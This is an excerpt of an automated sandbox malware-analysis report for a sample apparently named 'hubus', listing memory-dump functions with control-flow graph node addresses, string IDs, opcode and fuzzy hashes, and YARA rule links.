                                                                                                                                                                                                                                                              control_flow_graph 778 5a80040-5a8006e 779 5a80070 778->779 780 5a80075-5a80197 778->780 779->780 784 5a80199-5a801b5 call 5a82bc0 780->784 785 5a801bb-5a801c7 780->785 784->785 786 5a801c9 785->786 787 5a801ce-5a801d3 785->787 786->787 789 5a8020b-5a80254 787->789 790 5a801d5-5a801e1 787->790 800 5a8025b-5a80520 789->800 801 5a80256 789->801 791 5a801e8-5a80206 790->791 792 5a801e3 790->792 793 5a8196f-5a81975 791->793 792->791 795 5a819a0 793->795 796 5a81977-5a81997 793->796 799 5a819a1 795->799 796->795 799->799 826 5a80f50-5a80f5c 800->826 801->800 827 5a80f62-5a80f9a 826->827 828 5a80525-5a80531 826->828 837 5a81074-5a8107a 827->837 829 5a80538-5a8065d 828->829 830 5a80533 828->830 865 5a8069d-5a80726 829->865 866 5a8065f-5a80697 829->866 830->829 838 5a80f9f-5a8101c 837->838 839 5a81080-5a810b8 837->839 854 5a8101e-5a81022 838->854 855 5a8104f-5a81071 838->855 849 5a81416-5a8141c 839->849 852 5a810bd-5a812bf 849->852 853 5a81422-5a8146a 849->853 946 5a8135e-5a81362 852->946 947 5a812c5-5a81359 852->947 862 5a8146c-5a814df 853->862 863 5a814e5-5a81530 853->863 854->855 858 5a81024-5a8104c 854->858 855->837 858->855 862->863 883 5a81939-5a8193f 863->883 893 5a80728-5a80730 865->893 894 5a80735-5a807b9 865->894 866->865 886 5a81535-5a81545 883->886 887 5a81945-5a8196d 883->887 897 5a81551-5a815b7 886->897 887->793 896 5a80f41-5a80f4d 893->896 919 5a807c8-5a8084c 894->919 920 5a807bb-5a807c3 894->920 896->826 906 5a815b9-5a815d4 897->906 907 5a815df-5a815eb 897->907 906->907 909 5a815ed 907->909 910 5a815f2-5a815fe 907->910 909->910 911 5a81600-5a8160c 910->911 912 5a81611-5a81620 910->912 916 5a81920-5a81936 911->916 917 5a81629-5a81901 912->917 918 5a81622 912->918 916->883 952 5a8190c-5a81918 917->952 918->917 921 5a81788-5a817f1 918->921 922 5a8171a-5a81783 918->922 923 5a8169d-5a81715 918->923 924 5a8162f-5a81698 918->924 925 5a817f6-5a8185e 918->925 969 5a8085b-5a808df 919->969 970 5a8084e-5a80856 919->970 920->896 921->952 922->952 923->952 924->952 958 5a818d2-5a818d8 925->958 953 5a813bf-5a813fc 946->953 954 5a81364-5a813bd 946->954 971 5a813fd-5a81413 947->971 952->916 953->971 954->971 960 5a818da-5a818e4 958->960 961 5a81860-5a818be 958->961 960->952 974 5a818c0 961->974 975 5a818c5-5a818cf 961->975 984 5a808ee-5a80972 969->984 985 5a808e1-5a808e9 969->985 970->896 971->849 974->975 975->958 991 5a80981-5a80a05 984->991 992 5a80974-5a8097c 984->992 985->896 998 5a80a14-5a80a98 991->998 999 5a80a07-5a80a0f 991->999 992->896 1005 5a80a9a-5a80aa2 998->1005 1006 5a80aa7-5a80b2b 998->1006 999->896 1005->896 1012 5a80b3a-5a80bbe 1006->1012 1013 5a80b2d-5a80b35 1006->1013 1019 5a80bcd-5a80c51 1012->1019 1020 5a80bc0-5a80bc8 1012->1020 1013->896 1026 5a80c60-5a80ce4 1019->1026 1027 5a80c53-5a80c5b 1019->1027 1020->896 1033 5a80cf3-5a80d77 1026->1033 1034 5a80ce6-5a80cee 1026->1034 1027->896 1040 5a80d79-5a80d81 1033->1040 1041 5a80d86-5a80e0a 1033->1041 1034->896 1040->896 1047 5a80e19-5a80e9d 1041->1047 1048 5a80e0c-5a80e14 1041->1048 1054 5a80eac-5a80f30 1047->1054 1055 5a80e9f-5a80ea7 1047->1055 1048->896 1061 5a80f3c-5a80f3e 1054->1061 1062 5a80f32-5a80f3a 1054->1062 1055->896 1061->896 1062->896
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 2$$=r
                                                                                                                                                                                                                                                              • API String ID: 0-3892478113
                                                                                                                                                                                                                                                              • Opcode ID: 6830c1466fe9307bab7779f05555c43ce8bdbf88e2783f8e0e2484a8a4344491
                                                                                                                                                                                                                                                              • Instruction ID: 389b876436f75cdbaf6d0963a4604494b9b930236f58b57e45d45c060ab8a8fd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6830c1466fe9307bab7779f05555c43ce8bdbf88e2783f8e0e2484a8a4344491
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57E2E874E016188FDB65DF68E884B9ABBF2FB89302F1081D9D849A7354DB349E85CF50
                                                                                                                                                                                                                                                              Function 05AA8770 Relevance: 1.9, Strings: 1, Instructions: 686COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar
                                                                                                                                                                                                                                                              • API String ID: 0-793193261
                                                                                                                                                                                                                                                              • Opcode ID: c96c3bb350b5b98b2944d5c3882225950c4fd29d93fc0fc68584022560ce683a
                                                                                                                                                                                                                                                              • Instruction ID: 8b8fbff0d9de49ee2331bfb1b591336d1b1509750322bbe2f60af0e22a0068d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c96c3bb350b5b98b2944d5c3882225950c4fd29d93fc0fc68584022560ce683a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD427A75B006069FCB19DB69C494B6EFBF2FF88300F148529D56AD7381DB38A906CB90
                                                                                                                                                                                                                                                              Function 05AAD810 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PH=r
                                                                                                                                                                                                                                                              • API String ID: 0-1076057192
                                                                                                                                                                                                                                                              • Opcode ID: 80df32021041c14cbc5295f1f0593d991c0f3fd982e6d057b7bccf2fec49b05a
                                                                                                                                                                                                                                                              • Instruction ID: ac4ae614a4d0b7c49102bd901710c95df33607c0b88026e6a6f7d74d34584c85
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80df32021041c14cbc5295f1f0593d991c0f3fd982e6d057b7bccf2fec49b05a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26D10475E05218CFEB14CF69E888BAEBBF2FB49305F1080A9D489AB654CB745D85CF11
                                                                                                                                                                                                                                                              Function 05AAD800 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PH=r
                                                                                                                                                                                                                                                              • API String ID: 0-1076057192
                                                                                                                                                                                                                                                              • Opcode ID: ab622b2a56c32c57e018432a64163eabdd48f0be9173ec3d476cccbff3aaea8b
                                                                                                                                                                                                                                                              • Instruction ID: d0021664032bca48c2bec39203f11cbdf24281c18c20db2c53eb3d8fcfaa1abd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab622b2a56c32c57e018432a64163eabdd48f0be9173ec3d476cccbff3aaea8b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DD10474E05218CFDB14CF69E888BAEBBF2FB49301F5080A9D489AB654CB745D85CF11
                                                                                                                                                                                                                                                              Function 05A8E1D0 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Te=r
                                                                                                                                                                                                                                                              • API String ID: 0-4292089484
                                                                                                                                                                                                                                                              • Opcode ID: 3a446f9967d4ae0d25bf33b400010901a36de1004ab6cdd262e96d0ff2c52f42
                                                                                                                                                                                                                                                              • Instruction ID: a207f54741075bb6bfa6cbbbf17297dd60e522c872c27d67cd9bedc097ee148f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a446f9967d4ae0d25bf33b400010901a36de1004ab6cdd262e96d0ff2c52f42
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9A1F374E04218CFDB14DFA9D888BADBBFAFB49300F249469E409A7251DB709D85CF10
                                                                                                                                                                                                                                                              Function 05A8E1C1 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: Te=r
                                                                                                                                                                                                                                                              • API String ID: 0-4292089484
                                                                                                                                                                                                                                                              • Opcode ID: 560693c9b8a46cc3c63293936bcee07238feafc83bb2a3ef5ce4f2e686e82931
                                                                                                                                                                                                                                                              • Instruction ID: 05d499405a882ff26315cd347da4effe8d28fd896c2ea0e632ddfdf06fcf908e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 560693c9b8a46cc3c63293936bcee07238feafc83bb2a3ef5ce4f2e686e82931
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35A1E274E05218CFDB14DFA9D988BADBBF6FB49304F2484A9E409A7251EB709D85CF10
                                                                                                                                                                                                                                                              Function 05AAF0E4 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 86926fb8f252ecbdce0d3bd1f9c910923a7c6920bb33cfeee0e92bcd7117e588
                                                                                                                                                                                                                                                              • Instruction ID: a590271d8254604d7e2ff4a76d9c0e25067a67953f2970004b6fea022e9dc008
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86926fb8f252ecbdce0d3bd1f9c910923a7c6920bb33cfeee0e92bcd7117e588
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1491C675A05218CFEB64CF29E884B99B7F2FB89301F1480E9D509A7380DB345E85CF61
                                                                                                                                                                                                                                                              Function 05AE2470 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: +
                                                                                                                                                                                                                                                              • API String ID: 0-2126386893
                                                                                                                                                                                                                                                              • Opcode ID: e84bf074cd7fc57a454adef7535dab096919b802c39083a27eb6f7174bd4704e
                                                                                                                                                                                                                                                              • Instruction ID: 21ea38298857daf253d6cd62f64c235462070150615c941a548589cdd360d629
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e84bf074cd7fc57a454adef7535dab096919b802c39083a27eb6f7174bd4704e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A51E874E05218CFEB28CF2AD954B99BBF6BF89301F1480AA950DA7355DB745D81CF10
                                                                                                                                                                                                                                                              Function 05A819A3 Relevance: .5, Instructions: 539COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1ced32bfb63e6c218ddc08ab274b6f0bc8dc8a8ccbabafad64e1792630557b9a
                                                                                                                                                                                                                                                              • Instruction ID: 0e6eb5e98cf306520e0fd3eb8ad1e12708d6c0ac3ea66fee524922585742507d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ced32bfb63e6c218ddc08ab274b6f0bc8dc8a8ccbabafad64e1792630557b9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD52B378A046298FCB64DF28D984BAAB7B6FF48301F1081D9D94DA7351DB30AE81CF55
                                                                                                                                                                                                                                                              Function 05AEC968 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a0131125d8ea80833033bfde3c996095f3d23a9ac65f6a9a4224bbc0b811ff10
                                                                                                                                                                                                                                                              • Instruction ID: acbdc00223ccb23cd73d4655f7676201b860322cc930a7d3685d08ce6560a97d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0131125d8ea80833033bfde3c996095f3d23a9ac65f6a9a4224bbc0b811ff10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FD11074A05218CFDB24DF68E998BADBBF2FB49311F2090AAD409A7354DB345D85CF50
                                                                                                                                                                                                                                                              Function 05AEC958 Relevance: .3, Instructions: 288COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: c62a473683bafad364b4749364e33ae455aef56b3cdbb309f19d5d0a3d812ac0
                                                                                                                                                                                                                                                              • Instruction ID: f880cee1531eb49253e5b960f56f7d81018ccd850c8d6bf4205e54fb00f8f559
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c62a473683bafad364b4749364e33ae455aef56b3cdbb309f19d5d0a3d812ac0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0D11074A05208CFDB24DF68E998BAEBBF2FB49311F2090AAD409A7354DB345D85CF50
                                                                                                                                                                                                                                                              Function 05AE1F11 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 923b15652a4e6eeadd6bb4349925c605c276068db26152b413dafc9074292228
                                                                                                                                                                                                                                                              • Instruction ID: 93faf735c28032f457804e21bd2ee528f4fe4fc7464131ebc2c984d8b6f67619
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 923b15652a4e6eeadd6bb4349925c605c276068db26152b413dafc9074292228
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C91E574A05218CFDB14DF69E888BAEBBF2FF49301F5490AAD409A7290DB749D85CF50
                                                                                                                                                                                                                                                              Function 05AE1F20 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5303aba033ed8ac35a09fbdb6bfcb8d69397a63221b61c02ace207791526b975
                                                                                                                                                                                                                                                              • Instruction ID: 31bd7ec6eb2ab318e4127b882376cd0b5bf4c11c51068897ca6cd0481382b212
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5303aba033ed8ac35a09fbdb6bfcb8d69397a63221b61c02ace207791526b975
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F391E474A05218CFDB14DF69E888BAEBBF6FF49301F1090AAD409A7290DB749D85CF50
                                                                                                                                                                                                                                                              Function 05A80006 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b5e0685ddbc4de1014f6bc169f52e63dd30b75936b14cf012232e0d51964abb2
                                                                                                                                                                                                                                                              • Instruction ID: 62c25426e52aa24c929d1747e64ef5574c48d6393e047b84793809180d898ea0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5e0685ddbc4de1014f6bc169f52e63dd30b75936b14cf012232e0d51964abb2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B61E871E05A188BDB19CF6BDC4479ABBF3BFC9201F14C0AAC448AB255DB745A85CF50
                                                                                                                                                                                                                                                              Function 05AE245F Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a1381dc8a66afcb05a7a5615d136960f9bcd139fc32bbd903e58913f037a9bc3
                                                                                                                                                                                                                                                              • Instruction ID: eb8d81a87a6f2b20cf9e895ceb8e87b9d87462d02e5680986da09a8ced150b0b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1381dc8a66afcb05a7a5615d136960f9bcd139fc32bbd903e58913f037a9bc3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841F574E04218CBEB28CF6AD995B99BBF6BF89300F14C0AAD50DA7255DB355D82CF10
                                                                                                                                                                                                                                                              Function 02E5F688 Relevance: 6.6, Strings: 5, Instructions: 339COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 310 2e5f688-2e5f6b0 312 2e5f6b6-2e5f6ba 310->312 313 2e5f79c-2e5f7c1 310->313 314 2e5f6bc-2e5f6c8 312->314 315 2e5f6ce-2e5f6d2 312->315 320 2e5f7c8-2e5f7ec 313->320 314->315 314->320 316 2e5f7f3-2e5f818 315->316 317 2e5f6d8-2e5f6ef 315->317 339 2e5f81f-2e5f872 316->339 328 2e5f6f1-2e5f6fd 317->328 329 2e5f703-2e5f707 317->329 320->316 328->329 328->339 332 2e5f733-2e5f74c 329->332 333 2e5f709-2e5f722 call 2e50174 329->333 344 2e5f775-2e5f799 332->344 345 2e5f74e-2e5f772 332->345 333->332 343 2e5f724-2e5f727 333->343 353 2e5f874-2e5f894 339->353 354 2e5f8aa-2e5f8cf 339->354 348 2e5f730 343->348 348->332 361 2e5f8d6-2e5f92a 353->361 362 2e5f896-2e5f8a7 353->362 354->361 368 2e5f9d1-2e5fa1f 361->368 369 2e5f930-2e5f93c 361->369 381 2e5fa21-2e5fa45 368->381 382 2e5fa4f-2e5fa55 368->382 372 2e5f946-2e5f95a 369->372 373 2e5f93e-2e5f945 369->373 376 2e5f95c-2e5f981 372->376 377 2e5f9c9-2e5f9d0 372->377 388 2e5f9c4-2e5f9c7 376->388 389 2e5f983-2e5f99d 376->389 381->382 383 2e5fa47 381->383 384 2e5fa67-2e5fa76 382->384 385 2e5fa57-2e5fa64 382->385 383->382 388->376 388->377 389->388 391 2e5f99f-2e5f9a8 389->391 392 2e5f9b7-2e5f9c3 391->392 393 2e5f9aa-2e5f9ad 391->393 393->392
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar$(Ar$(Ar$(Ar$(Ar
                                                                                                                                                                                                                                                              • API String ID: 0-4191292406
                                                                                                                                                                                                                                                              • Opcode ID: 1368c1ca5407eb5916195e9e1cd7837aba5399bb3b874f4204a92a8fad351b25
                                                                                                                                                                                                                                                              • Instruction ID: 828f2a2f59b71650879b226cea6ed675d2a75a155ff2d65d5c033e52f8434f34
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1368c1ca5407eb5916195e9e1cd7837aba5399bb3b874f4204a92a8fad351b25
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDB1F1323106168FDB19DB68D954B6E7BE2EF85319F14846AE905CB395CB34EC02C7A1
                                                                                                                                                                                                                                                              Function 05AA64B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 394 5aa64b0-5aa64e3 397 5aa64ec-5aa64ef 394->397 398 5aa64e5 394->398 399 5aa6b4d-5aa6b59 397->399 400 5aa64f5-5aa64f8 397->400 398->398 401 5aa6b5b-5aa6b5d 399->401 402 5aa6b67-5aa6b81 399->402 403 5aa64fe-5aa650a 400->403 404 5aa6cb5-5aa6cd7 400->404 401->402 405 5aa6b83-5aa6b85 402->405 406 5aa6b87-5aa6b89 402->406 407 5aa6518-5aa6559 403->407 408 5aa650c-5aa650e 403->408 417 5aa6cda-5aa6d18 404->417 405->406 409 5aa6b8b 405->409 410 5aa6b90-5aa6b92 406->410 420 5aa6cab-5aa6cb2 407->420 408->407 409->410 412 5aa6bbe-5aa6bf8 call 5aa27f0 410->412 413 5aa6b94-5aa6bbc 410->413 427 5aa6bfd-5aa6c1a 412->427 413->427 434 5aa6d1a-5aa6d41 417->434 435 5aa6d83-5aa6d90 417->435 427->420 434->417 436 5aa6d7d-5aa6d7f 435->436 437 5aa6d92-5aa6d93 435->437 436->435
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (_=r$(_=r$(_=r$(_=r
                                                                                                                                                                                                                                                              • API String ID: 0-2219016859
                                                                                                                                                                                                                                                              • Opcode ID: d1c86cb6abf9e8ce29f7b05c8c9c98ad8068703273b2a6dc02c629d22f5af175
                                                                                                                                                                                                                                                              • Instruction ID: 22e3ff312960eee260fd7b6a2b0995218ca04ca3d346cb090a1b7e0cd9ade4cd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1c86cb6abf9e8ce29f7b05c8c9c98ad8068703273b2a6dc02c629d22f5af175
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1161AE76F042058FDB04DF78C865A6E7BB2EF89314B588569D9029B3A1DB31DC46CF90
                                                                                                                                                                                                                                                              Function 05A8E680 Relevance: 4.2, Strings: 3, Instructions: 481COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
